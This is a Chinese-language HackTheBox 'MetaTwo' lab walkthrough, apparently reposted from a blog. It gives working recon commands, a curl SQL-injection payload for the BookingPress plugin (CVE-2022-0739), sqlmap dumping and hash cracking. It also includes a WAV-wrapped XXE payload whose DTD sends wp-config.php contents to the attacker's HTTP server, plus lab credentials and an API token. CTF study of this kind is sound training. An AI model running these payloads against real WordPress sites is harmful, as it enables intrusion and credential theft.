HackTheBox-MetaTwo
2023-5-7 20:26:25 Author: Matrix1024(查看原文) 阅读量:22 收藏

01

信息收集

使用Nmap对靶机地址10.129.228.95进行端口嗅探,发现开放21,22,80三个端口。

sudo nmap -sT -p- --min-rate 10000 10.129.228.95 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 01:47 EDTWarning: 10.129.228.95 giving up on port because retransmission cap hit (10).Nmap scan report for 10.129.228.95Host is up (0.37s latency).Not shown: 56012 closed tcp ports (conn-refused), 9520 filtered tcp ports (no-response)PORT   STATE SERVICE21/tcp open  ftp22/tcp open  ssh80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 95.79 seconds

​使用Nmap默认脚本对继续对21,22,80端口进行嗅探,发现存在metapress.htb子域名。

sudo nmap -sS -sC 10.129.228.95 -p 21,22,80Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-07 01:52 EDTNmap scan report for 10.129.228.95Host is up (0.50s latency).PORT   STATE SERVICE21/tcp open  ftp22/tcp open  ssh| ssh-hostkey: |   3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)|   256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)|_  256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)80/tcp open  http|_http-title: Did not follow redirect to http://metapress.htb/Nmap done: 1 IP address (1 host up) scanned in 85.46 seconds

​未发现存在FTP匿名登录。

ftp [email protected]10.129.228.95:21

将metapress.htb域名添加到/etc/hosts文件中,使得可以正常DNS解析访问网页。

# MetaTwo10.129.228.95 metapress.htb

使用wfuzz工具对metapress.htb子域名进行FUZZ,发现均返回302状态码,使用“--hl 7”对结果进行过滤,未发现其他子域名信息。

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host:FUZZ.metapress.htb" -u "http://metapress.htb/"
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hl 7 -H "Host:FUZZ.metapress.htb" -u "http://metapress.htb/"

访问80端口Web页面如下,通过wappalyzer发现站点WordPress、Nginx、PHP等信息。

WordPress 5.6.2Nginx 1.18.0PHP  8.0.24

​使用feroxbuster进行目录扫描,使用"-C 302,301,404,502”过滤状态码后,未发现有用信息。

feroxbuster -u http://metapress.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -C 302,301,404,502

使用wpscan对站点WordPress进行漏洞扫描,发现存在以下漏洞。

wpscan --url http://metapress.htb/ --api-token=5cex36dDY8mWXTLkxrPsknaT2rRSZhTEoA0aUCHtTNw | [!] 29 vulnerabilities identified: | | [!] Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 |     Fixed in: 5.6.3 |     References: |      - https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/ |      - https://core.trac.wordpress.org/changeset/29378 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh |      - https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/ |      - https://hackerone.com/reports/1095645 |      - https://www.youtube.com/watch?v=3NBxcmqCgt4 | | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure |     Fixed in: 5.6.3 |     References: |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/ |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq |      - https://core.trac.wordpress.org/changeset/50717/ |      - https://www.youtube.com/watch?v=J2GXmxAdNWs | | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer |     Fixed in: 5.6.4 |     References: |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/ |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/ |      - https://www.youtube.com/watch?v=HaW15aMzBUM | | [!] Title: WordPress 5.4 to 5.8 -  Lodash Library Update |     Fixed in: 5.6.5 |     References: |      - https://wpscan.com/vulnerability/5d6789db-e320-494b-81bb-e678674f4199 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/ |      - https://github.com/lodash/lodash/wiki/Changelog |      - https://github.com/WordPress/wordpress-develop/commit/fb7ecd92acef6c813c1fde6d9d24a21e02340689 | | [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor |     Fixed in: 5.6.5 |     References: |      - https://wpscan.com/vulnerability/5b754676-20f5-4478-8fd3-6bc383145811 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39201 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/ |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-wh69-25hr-h94v | | [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API |     Fixed in: 5.6.5 |     References: |      - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/ |      - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5 | | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate |     Fixed in: 5.6.6 |     References: |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/ |      - https://core.trac.wordpress.org/ticket/54207 | | [!] Title: WordPress < 5.8 - Plugin Confusion |     Fixed in: 5.8 |     References: |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/ | | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query |     Fixed in: 5.6.7 |     References: |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84 |      - https://hackerone.com/reports/1378209 | | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs |     Fixed in: 5.6.7 |     References: |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w |      - https://hackerone.com/reports/425342 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability | | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query |     Fixed in: 5.6.7 |     References: |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86 | | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites |     Fixed in: 5.6.7 |     References: |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h |      - https://hackerone.com/reports/541469 | | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery |     Fixed in: 5.6.8 |     References: |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/ | | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting |     Fixed in: 5.6.9 |     References: |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/ | | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting |     Fixed in: 5.6.9 |     References: |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/ | | [!] Title: WP < 6.0.2 - SQLi via Link API |     Fixed in: 5.6.9 |     References: |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/ | | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283 | | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095 | | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44 | | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc | | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0 | | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef | | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955 | | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8 | | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f | | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492 | | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e | | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg |     Fixed in: 5.6.10 |     References: |      - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ |      - https://github.com/WordPress/gutenberg/pull/45045/files | | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding |     References: |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/

在google查询漏洞信息,发现存在漏洞利用脚本,但是需要站点账户登录凭据。

https://www.exploit-db.com/exploits/50304

02

获取站点权限

继续分析页面,在http://metapress.htb/events/源代码中发现了bookingpress-appointment-booking插件,该插件可能存在CVE-2022-0739漏洞,该漏洞是在BookingPress版本小于1.0.11时存在未授权的SQL注入漏洞。

bookingpress-appointment-booking CVE-2022-0739

查看漏洞利用脚本如下,在http://metapress.htb/events/源代码中找到了_wpnonce的值75eb04a260。

https://vulners.com/wpexploit/WPEX-ID:388CD42D-B61A-42A4-8604-99B812DB2357
view-source:http://metapress.htb/events/  75eb04a260

使用curl工具对漏洞进行验证,在返回包中发现数据库版本等信息,验证CVE-2022-0739漏洞存在。

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \  --data 'action=bookingpress_front_get_category_services&_wpnonce=75eb04a260&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

将请求包放至sql.txt文件中,使用sqlmap进行自动化注入并利用,最终在blog数据库wp_users数据表中找到登录账户及加密口令。

sqlmap -r sql.txt -p total_service
sqlmap -r sql.txt -p total_service -D blog -T wp_users --dump
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

将其放至hash.txt中,使用hashcat进行爆破,在未使用“-m”指定爆破模式时其能自动识别并进行爆破。最后获取到了manager账户的口令信息,成功登录wordpress站点。

hashcat hash.txt /usr/share/wordlists/rockyou.txt --user
manager:partylikearockstar

03

获取jnelson权限

在http://metapress.htb/wp-admin/upload.php页面发现media-library,可以利用前面收集的“Authenticated XXE Within the Media Library Affecting PHP 8”漏洞进行攻击。使用漏洞利用脚本攻击,未能攻击成功,可能是脚本有问题,下面进行手工攻击。

在攻击机/home/kali/Desktop/MetaTwo/XXE目录下使用如下命令建立payload.wav文件。因为上传的是wav文件,为了文件能够正常解析,需要增加“RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00”wav头。

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><ANY[<!ENTITY % remote SYSTEM "http://10.10.14.4:8000/xx3.dtd">%remote;%init;%trick;]>\x00' > payload.wav

在目录下新建xx3.dtd文件,并将以下内容保存至xx3.dtd文件,并在该目录下使用python开启一个http.server服务。

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php"><!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.14.4:8000/?p=%file;'>" >

在站点中上传payload.wav文件,可以看到http.server服务成功返回base64编码的数据,将数据进行base64解码,成功获取到wp-config.php文件内容。

在wp-config.php文件中找到了FTP凭据和MySQL凭据,由于未开放3306端口,仅能对FTP凭据进行利用。

metapress.htb:9[email protected]_p5M2NvJ

同理,利用XXE漏洞也可以获取到/etc/passwd文件内容。

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:109::/nonexistent:/usr/sbin/nologinsshd:x:104:65534::/run/sshd:/usr/sbin/nologinjnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bashsystemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologinsystemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologinmysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/falseproftpd:x:106:65534::/run/proftpd:/usr/sbin/nologinftp:x:107:65534::/srv/ftp:/usr/sbin/nologin

使用metapress.htb:[email protected]_p5M2NvJ凭据登录FTP,在mailer文件夹下发现send_email.php文件。

将send_email.php下载至本地查看,发现jnelson凭据。

[email protected]:[email protected]

使用SSH远程登录jnelson账户,成功获取到user.txt。

ssh [email protected]

04

获取root权限

使用“sudo -l”命令查看,未发现jnelson账户可以使用sudo特权的文件。使用“ls -la”发现目录下存在passpie的隐藏目录。

通过信息收集发现其为一款命令行密码管理的工具,在命令行输入passpie,验证靶机确实存在passpie工具。

在.passple目录下发现keys信息,将.keys文件下载至本地。

使用gpg2john工具将keys文件内容转换为可爆破的hash输出至key_hash.txt 中,页面提示需要将公钥块内容去掉。

gpg2john keys | tee key_hash.txt 
Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <[email protected]>::keys

使用john对key_hash.txt进行爆破,成功获得私钥blink182。

john --wordlist=/usr/share/wordlists/rockyou.txt key_hash.txtblink182         (Passpie)  

利用passpie工具将root口令转换为明文,成功获取root口令。

passpie copy --to stdout --passphrase blink182 [email protected]
root:p7qfAZt4_A1xo_0x

在root家目录下成功获取root.txt。

[email protected]:~/.passpie$ su -Password:[email protected]:~# lsrestore  root.txt[email protected]:~# cat root.txtcf89bad430b631359bd61a8520424071

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NzYxMjI5OA==&mid=2247485603&idx=1&sn=003973553a2e43290d5a773492802b5b&chksm=c06e67c6f719eed0a65045c1373171d043b7e0d020e9883bbb7746e3ac627caa4b50c3532a5f#rd
如有侵权请联系:admin#unsafe.sh